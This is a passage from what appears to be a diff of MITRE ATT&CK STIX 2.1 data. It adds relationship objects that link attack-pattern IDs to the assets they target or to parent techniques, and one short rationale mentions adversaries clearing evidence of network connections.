"x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--261cf79f-8b68-475f-9698-8caa5ef605ad", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--263e33e8-1394-4290-a5fd-332eb6b5e37f", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--264744b4-2e08-4c2d-b6e8-028bac7bc8d6", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2653a96d-8a5e-419c-b586-3d8106d949e7", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--266211c4-b40d-41db-82fb-85be6f58ca4b", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--26767543-43d1-4269-aefe-82bb9fac5297", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--26775c9e-71d8-4179-86bb-82bf6cd0fde0", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--267fe88e-eab3-47fb-b873-b0a94318a013", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--268a54ab-8aa7-4fe0-bc18-4f0ab0fc5102", + "created": "2024-06-27T09:34:52.362Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:34:52.362Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--26c63f2f-1459-4a52-881c-af613adf151f", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--26c89a26-b804-471c-bb2d-de1e3cca50ff", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--26d1f776-fa45-4892-8522-c30bf8d9eadd", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--26d64c06-c277-473d-94e8-e9990b6adc8e", + "created": "2020-03-13T20:26:49.676Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--26daeea0-eefe-47b5-ad0d-f6ddaa67066e", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--26f9797b-a29c-4ac2-8edf-a5d0f35ee812", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--271d1f0f-ee52-4d13-aa66-d26d277eeac7", + "created": "2024-05-22T17:17:03.985Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T00:46:31.492Z", + "description": "Asset Mapping Rationale: Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations.", + "relationship_type": "targets", + "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--273b4ad9-ab27-4f4b-ac54-fc98c01be666", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2744fa1d-ac17-4187-b017-3d02d9bef4af", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--27660798-1099-4bc7-9496-2b07de076f67", + "created": "2020-03-12T20:43:54.110Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--27672c84-4672-4b4d-8bee-89c4cadb482c", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--277ecfd1-2ef8-4fcb-b379-002f7cfaa407", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2790d1be-bd24-4036-a2f4-39aeb1d90492", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--279abe3c-ad88-4cc6-8657-11729487e27c", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--27a0bab5-18a6-49c2-856c-40fc67cf44e3", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--27e5c6f9-dd0f-4682-8c37-c8159c3f940a", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--27ed2a8f-ccf1-4320-8b4a-eb66b99fec39", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--27fcfb28-a452-42fe-b33e-0bb76550e883", + "created": "2020-01-10T03:43:37.373Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", + "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--280b143c-ec99-45da-98f6-aa64e755f9bd", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2821bd17-6a28-47f1-94c0-f3439e607ae4", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2825675c-2b62-468d-96ee-f1e80ca15973", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--284a3fcc-4c0f-48b4-8036-e3d440d0b4aa", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--284aadab-ec10-4869-8bdb-7258c19432c4", + "created": "2020-03-14T23:08:20.407Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--284fae33-7e3d-4dad-91ad-701d3159b6f5", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2851fd6f-7096-46d8-a81b-1f644e8813e2", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--287b247f-8ec3-4d8d-a521-050ac8c791ad", + "created": "2023-09-29T18:05:32.443Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:05:32.443Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--287b6305-0592-4843-a12b-57f96741a36e", + "created": "2020-01-14T01:34:10.663Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--28936f2e-6241-47ab-9af9-0fb6170578ca", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--289c43cc-3b61-4b33-8af7-3010c94b6467", + "created": "2021-11-22T15:02:15.267Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-24T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--28a142b0-d2df-49d0-8f9c-55f99230657c", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": 